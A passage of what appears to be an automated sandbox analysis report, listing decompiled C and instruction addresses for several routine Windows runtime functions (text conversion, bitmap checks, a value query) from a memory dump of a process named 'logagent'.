												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                              0x051eebb8
                                              0x051eebbf
                                              0x051eebc1
                                              0x051eebc6
                                              0x00000000
                                              0x0522b6d6
                                              0x051eebcd
                                              0x051eebd2
                                              0x051eec95
                                              0x0522b6e0
                                              0x051eec9b
                                              0x051eeca1
                                              0x051eeca1
                                              0x051eec89
                                              0x00000000
                                              0x051eec89
                                              0x051eebd8
                                              0x051eebdd
                                              0x0522b6ea
                                              0x00000000
                                              0x051eebe3
                                              0x051eebe5
                                              0x051eebe7
                                              0x051eebef
                                              0x051eebf2
                                              0x00000000
                                              0x051eebf5
                                              0x00000000
                                              0x051eebf5
                                              0x051eebf5
                                              0x051eebf7
                                              0x0522b6f6
                                              0x051eec7c
                                              0x051eec7c
                                              0x051eec7f
                                              0x051eec82
                                              0x051eec87
                                              0x00000000
                                              0x051eec87
                                              0x051eec1a
                                              0x051eec1a
                                              0x051eec25
                                              0x0522b725
                                              0x0522b72c
                                              0x0522b72c
                                              0x051eec2d
                                              0x051eec31
                                              0x0522b73c
                                              0x0522b744
                                              0x0522b748
                                              0x0522b748
                                              0x0522b749
                                              0x0522b749
                                              0x0522b74a
                                              0x0522b74a
                                              0x051eec3e
                                              0x0522b860
                                              0x00000000
                                              0x051eec44
                                              0x051eec47
                                              0x0522b750
                                              0x0522b758
                                              0x0522b767
                                              0x0522b775
                                              0x0522b77c
                                              0x0522b77f
                                              0x0522b769
                                              0x0522b76c
                                              0x0522b76c
                                              0x0522b781
                                              0x0522b788
                                              0x0522b78b
                                              0x0522b75a
                                              0x0522b75d
                                              0x0522b75d
                                              0x0522b78d
                                              0x0522b792
                                              0x0522b793
                                              0x0522b793
                                              0x051eec54
                                              0x051eec56
                                              0x051eec57
                                              0x051eec59
                                              0x051eec5e
                                              0x051eecaa
                                              0x051eed16
                                              0x051eed16
                                              0x051eecac
                                              0x051eecaf
                                              0x051eecb4
                                              0x051eecb6
                                              0x051eecb6
                                              0x051eecb9
                                              0x051eecbf
                                              0x0522b7c1
                                              0x0522b7c8
                                              0x0522b7d3
                                              0x0522b7db
                                              0x0522b7ec
                                              0x0522b858
                                              0x00000000
                                              0x0522b858
                                              0x0522b7ee
                                              0x0522b7f1
                                              0x0522b7f4
                                              0x0522b7ff
                                              0x0522b850
                                              0x00000000
                                              0x0522b850
                                              0x0522b80a
                                              0x0522b813
                                              0x0522b81c
                                              0x0522b81d
                                              0x0522b822
                                              0x0522b825
                                              0x0522b828
                                              0x0522b831
                                              0x0522b832
                                              0x0522b837
                                              0x0522b840
                                              0x0522b842
                                              0x0522b845
                                              0x0522b848
                                              0x00000000
                                              0x0522b848
                                              0x0522b7df
                                              0x00000000
                                              0x0522b7df
                                              0x0522b7cc
                                              0x00000000
                                              0x0522b7cc
                                              0x051eecc5
                                              0x051eecc7
                                              0x051eeccb
                                              0x0522b79b
                                              0x0522b79e
                                              0x0522b7a4
                                              0x00000000
                                              0x00000000
                                              0x0522b7a6
                                              0x0522b7a8
                                              0x0522b7a8
                                              0x051eecd3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051eecd5
                                              0x051eecd5
                                              0x051eecd5
                                              0x051eecd8
                                              0x051eecda
                                              0x051eece4
                                              0x00000000
                                              0x00000000
                                              0x051eecea
                                              0x051eeced
                                              0x051eecf0
                                              0x051eecf2
                                              0x051eecfb
                                              0x051eecfe
                                              0x051eed01
                                              0x051eed06
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051eed06
                                              0x0522b7ae
                                              0x0522b7b1
                                              0x0522b7b7
                                              0x00000000
                                              0x00000000
                                              0x0522b7b9
                                              0x0522b7bb
                                              0x051eed08
                                              0x051eed08
                                              0x051eed0c
                                              0x051eed0c
                                              0x00000000
                                              0x051eec60
                                              0x051eec62
                                              0x051eed0f
                                              0x051eed0f
                                              0x00000000
                                              0x051eed0f
                                              0x051eec68
                                              0x051eec6c
                                              0x051eec6f
                                              0x051eec75
                                              0x051eec0d
                                              0x051eec0d
                                              0x051eec18
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051eec18
                                              0x051eec77
                                              0x051eec79
                                              0x051eec79
                                              0x00000000
                                              0x051eec68
                                              0x051eec5e
                                              0x051eec3e
                                              0x051eebfd
                                              0x051eec02
                                              0x0522b701
                                              0x0522b70c
                                              0x0522b71b
                                              0x0522b71d
                                              0x0522b71d
                                              0x00000000
                                              0x0522b70c
                                              0x051eec08
                                              0x051eec0a
                                              0x00000000
                                              0x051eec0a
                                              0x051eebf5
                                              0x051eebf5

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                              • Instruction ID: 6d32a02e894bf604f2176413878666f1404405501cc96cd512f54bb5030ba1ff
                                              • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                              • Instruction Fuzzy Hash: 05818F36A186669FDB34CE6CC4C027DBB6AFF52300F29477AD8469B741C325D885D391
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05281D55 Relevance: .2, Instructions: 226COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E05281D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x5291070);
				E0520D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E0528337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E052833B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E051F96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E052833B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E051EE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x52a5880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E051EDFDF(_t91, 1, _t142);
					}
					return E0520D0D1(_t103);
				}
			}





































                                              0x05281d55
                                              0x05281d55
                                              0x05281d57
                                              0x05281d5c
                                              0x05281d63
                                              0x05281d66
                                              0x05281d69
                                              0x05281d6c
                                              0x05281d6e
                                              0x05281d71
                                              0x05281d74
                                              0x05281d77
                                              0x05281d7a
                                              0x05281d7d
                                              0x05281d82
                                              0x05281d85
                                              0x05281d88
                                              0x05281d8d
                                              0x05281d90
                                              0x05281d94
                                              0x05281d96
                                              0x05281d98
                                              0x05281d98
                                              0x05281d9b
                                              0x05281d9e
                                              0x00000000
                                              0x05281da1
                                              0x05281da5
                                              0x05281e78
                                              0x05281e78
                                              0x05281e82
                                              0x05281e87
                                              0x05281e8a
                                              0x05281e8d
                                              0x05281e92
                                              0x05281e95
                                              0x05281e98
                                              0x05281e9b
                                              0x05281ede
                                              0x05281ee3
                                              0x05281ee8
                                              0x05281ef2
                                              0x05281ef2
                                              0x05281ef5
                                              0x05281ef8
                                              0x05281efe
                                              0x05281f03
                                              0x00000000
                                              0x05281f09
                                              0x05281f0c
                                              0x05281f0e
                                              0x05281f11
                                              0x00000000
                                              0x05281f17
                                              0x05281f17
                                              0x05281f1a
                                              0x05281f31
                                              0x05281f34
                                              0x05281f3f
                                              0x05281f42
                                              0x05281f45
                                              0x05281f47
                                              0x05281f4a
                                              0x05281f4d
                                              0x05281f4f
                                              0x05281f63
                                              0x05281f65
                                              0x05281f67
                                              0x00000000
                                              0x05281f69
                                              0x05281f69
                                              0x05281f72
                                              0x05281f72
                                              0x05281f75
                                              0x05281f77
                                              0x00000000
                                              0x00000000
                                              0x05281f6e
                                              0x05281f70
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05281f70
                                              0x05281f83
                                              0x05281f83
                                              0x05281f85
                                              0x00000000
                                              0x05281f85
                                              0x05281f51
                                              0x05281f53
                                              0x05281f5a
                                              0x05281f5c
                                              0x05281f87
                                              0x05281f87
                                              0x05281f87
                                              0x05281f8b
                                              0x05281f8d
                                              0x05281f90
                                              0x00000000
                                              0x05281f90
                                              0x05281f1c
                                              0x05281f1c
                                              0x00000000
                                              0x05281f22
                                              0x05281f22
                                              0x05281f25
                                              0x05281f28
                                              0x05281f97
                                              0x05281f97
                                              0x05281f9d
                                              0x05281fa7
                                              0x05281faa
                                              0x05281fb1
                                              0x05281fb9
                                              0x05281fbd
                                              0x05281fbe
                                              0x05281fc0
                                              0x05281f2a
                                              0x05281f93
                                              0x05281f93
                                              0x05281f95
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05281f95
                                              0x05281f28
                                              0x05281f1c
                                              0x05281f1a
                                              0x05281f11
                                              0x05281e9d
                                              0x05281ea0
                                              0x05281eae
                                              0x05281eb4
                                              0x05281ebc
                                              0x05281ebc
                                              0x05281ec2
                                              0x05281ec8
                                              0x05281ecd
                                              0x00000000
                                              0x05281ed3
                                              0x05281ed3
                                              0x00000000
                                              0x05281ed3
                                              0x05281ecd
                                              0x05281dab
                                              0x05281dab
                                              0x05281db1
                                              0x05281db3
                                              0x05281db9
                                              0x05281dbf
                                              0x05281dc2
                                              0x05281dda
                                              0x05281ddd
                                              0x05281de0
                                              0x05281de9
                                              0x05281dec
                                              0x05281def
                                              0x05281df1
                                              0x05281df3
                                              0x05281e0a
                                              0x05281e0c
                                              0x05281e0e
                                              0x00000000
                                              0x05281e10
                                              0x05281e10
                                              0x05281e13
                                              0x05281e16
                                              0x05281e16
                                              0x05281e19
                                              0x05281e1c
                                              0x05281e1e
                                              0x05281e20
                                              0x00000000
                                              0x00000000
                                              0x05281e22
                                              0x05281e24
                                              0x00000000
                                              0x05281e26
                                              0x00000000
                                              0x05281e26
                                              0x00000000
                                              0x05281e24
                                              0x05281e30
                                              0x05281e30
                                              0x00000000
                                              0x05281e30
                                              0x05281df5
                                              0x05281df7
                                              0x05281e01
                                              0x05281e32
                                              0x05281e34
                                              0x05281e36
                                              0x00000000
                                              0x05281e36
                                              0x05281dc4
                                              0x05281dc4
                                              0x00000000
                                              0x05281dc6
                                              0x05281dc6
                                              0x05281dc9
                                              0x05281dcf
                                              0x05281dd1
                                              0x05281e38
                                              0x05281e38
                                              0x05281e38
                                              0x05281e38
                                              0x05281dc4
                                              0x05281dbb
                                              0x05281dbb
                                              0x05281dbb
                                              0x05281dbb
                                              0x05281e3a
                                              0x05281e3a
                                              0x05281e3d
                                              0x05281e40
                                              0x05281e43
                                              0x05281e6f
                                              0x05281fc7
                                              0x05281fc7
                                              0x05281e75
                                              0x05281e75
                                              0x00000000
                                              0x05281e75
                                              0x05281e6f
                                              0x05281fca
                                              0x05281fca
                                              0x05281fce
                                              0x05281fd0
                                              0x05281fd0
                                              0x05281fd3
                                              0x05281fd9
                                              0x05281fde
                                              0x05281fe4
                                              0x05281fe4
                                              0x05281fee
                                              0x05281fee

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88e58dcb2734b6459f942ce699d0a38bbe7e4f06cbe1963d0e370998c1ffd31c
                                              • Instruction ID: 1b7b4a2d974d37aef9680fcc024cc23fa0dc8860c3c0a24874218633ed4112dc
                                              • Opcode Fuzzy Hash: 88e58dcb2734b6459f942ce699d0a38bbe7e4f06cbe1963d0e370998c1ffd31c
                                              • Instruction Fuzzy Hash: 2A814B71E222198BDF18EFA8C880AFCB7B2BF59314B144259E416EB3C5DB319956CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BC600 Relevance: .2, Instructions: 225COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E051BC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x52ad360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E051C6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E051FB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x52a7b9c; // 0x0
					_t74 = L051D4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E051F9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L051D77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E051FF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E051F13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L051D77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E051F9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                              0x051bc608
                                              0x051bc615
                                              0x051bc625
                                              0x051bc62d
                                              0x051bc635
                                              0x051bc640
                                              0x051bc680
                                              0x051bc687
                                              0x051bc688
                                              0x051bc689
                                              0x051bc694
                                              0x051bc694
                                              0x051bc642
                                              0x051bc64a
                                              0x051bc697
                                              0x05227a25
                                              0x05227a2b
                                              0x05227a2e
                                              0x05227a30
                                              0x05227bea
                                              0x05227bea
                                              0x00000000
                                              0x05227bea
                                              0x05227a36
                                              0x05227a43
                                              0x05227a48
                                              0x05227a4c
                                              0x05227a4e
                                              0x00000000
                                              0x00000000
                                              0x05227a58
                                              0x05227a5a
                                              0x05227a5b
                                              0x05227a5c
                                              0x05227a5d
                                              0x05227a63
                                              0x05227a64
                                              0x05227a6a
                                              0x05227a6c
                                              0x05227a6e
                                              0x052279cb
                                              0x052279cb
                                              0x052279ce
                                              0x052279d0
                                              0x05227a98
                                              0x05227a9b
                                              0x05227a9b
                                              0x05227a9e
                                              0x05227aa1
                                              0x05227bbe
                                              0x05227bbe
                                              0x05227bc0
                                              0x05227be0
                                              0x05227be0
                                              0x05227a01
                                              0x05227a01
                                              0x05227a05
                                              0x05227a07
                                              0x05227a15
                                              0x05227a15
                                              0x05227a1a
                                              0x00000000
                                              0x05227a1a
                                              0x05227bc2
                                              0x05227bc6
                                              0x05227bc9
                                              0x05227bcd
                                              0x05227bcf
                                              0x052279e6
                                              0x052279e6
                                              0x052279eb
                                              0x052279eb
                                              0x052279ef
                                              0x052279f1
                                              0x00000000
                                              0x00000000
                                              0x052279f3
                                              0x052279f5
                                              0x052279ff
                                              0x052279ff
                                              0x00000000
                                              0x052279ff
                                              0x052279f7
                                              0x052279fd
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x052279fd
                                              0x05227bd5
                                              0x05227bd8
                                              0x00000000
                                              0x00000000
                                              0x05227ba9
                                              0x05227bac
                                              0x05227bb0
                                              0x05227bb1
                                              0x05227bb1
                                              0x05227bb6
                                              0x00000000
                                              0x05227bb6
                                              0x05227aa7
                                              0x05227aaa
                                              0x00000000
                                              0x00000000
